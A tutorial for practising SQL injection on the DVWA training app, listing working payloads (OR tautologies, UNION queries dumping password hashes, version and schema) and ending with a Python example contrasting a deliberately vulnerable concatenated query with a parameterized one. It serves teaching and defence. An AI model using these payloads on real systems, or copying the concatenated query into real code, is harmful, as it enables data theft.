SQL Injection using DVWA
SQL injection happens when user input is inserted directly into a SQL query without validation. Here are the steps to practise it on DVWA.
- Open DVWA: http://localhost/dvwa
- Login
- Go to DVWA Security
- Set: Security Level → Low
- Click Submit
Now go to:
DVWA → SQL Injection
What this page does
You’ll see:
User ID: [ ]
[Submit]
It runs a query like:
SELECT first_name, last_name FROM users WHERE user_id = '$id';
Since input is not sanitized → injectable.
Normal query
Enter:
1
You’ll see:
ID: 1
First name: admin
Surname: admin
3. Basic SQL Injection
Enter:
1' OR '1'='1
Result:
👉 All users displayed
Why?
Query becomes:
SELECT first_name,last_name FROM users
WHERE user_id='1' OR '1'='1';
'1'='1' is always true → DB returns all rows.
4. Dump all users
Enter:
' OR 1=1 #
or
' OR 1=1 --
You’ll see the full user table.
5. UNION attack
Enter:
1' UNION SELECT user,password FROM users #
Now DVWA will show:
- usernames
- password hashes
Students get shocked here
6. Dump database version
1' UNION SELECT @@version, database() #
Shows:
- MySQL version
- DB name
7. Dump table names
1' UNION SELECT table_name, null
FROM information_schema.tables #
8. Dump column names
1' UNION SELECT column_name, null
FROM information_schema.columns
WHERE table_name='users' #
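
The same lookup built two ways, as an added example that is not DVWA's own code: string concatenation as in the query under "What this page does", and a parameterized query that treats the inputs from steps 3 and 4 as plain values. It assumes an in-memory SQLite table with constructed rows standing in for DVWA's MySQL users table; SQLite has no # comment, so only the -- variant from step 4 is used.

```python
import sqlite3

# Constructed sample rows (assumption); DVWA's real table lives in MySQL.
ROWS = [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")]


def make_db():
    """Build a throwaway in-memory table shaped like the page's query expects."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)"
    )
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return db


def lookup_vulnerable(db, user_id):
    # Same pattern as the page's query: the input is pasted into the SQL text,
    # so a quote in the input ends the string literal and the rest is parsed as SQL.
    sql = (
        "SELECT first_name, last_name FROM users WHERE user_id = '"
        + user_id + "';"
    )
    return db.execute(sql).fetchall()


def lookup_parameterized(db, user_id):
    # The ? placeholder binds the input as a value; it is never parsed as SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?;"
    return db.execute(sql, (user_id,)).fetchall()


def compare(inputs):
    """Return {input: (rows from vulnerable query, rows from parameterized query)}."""
    db = make_db()
    return {
        value: (len(lookup_vulnerable(db, value)),
                len(lookup_parameterized(db, value)))
        for value in inputs
    }


if __name__ == "__main__":
    samples = ["1", "1' OR '1'='1", "' OR 1=1 --"]
    for value, (vuln, safe) in compare(samples).items():
        print(f"{value!r:20} vulnerable={vuln} rows  parameterized={safe} rows")
```

With the concatenated query both injected inputs return every row; with the bound parameter they match no user_id and return nothing, while the normal input 1 still returns its single row.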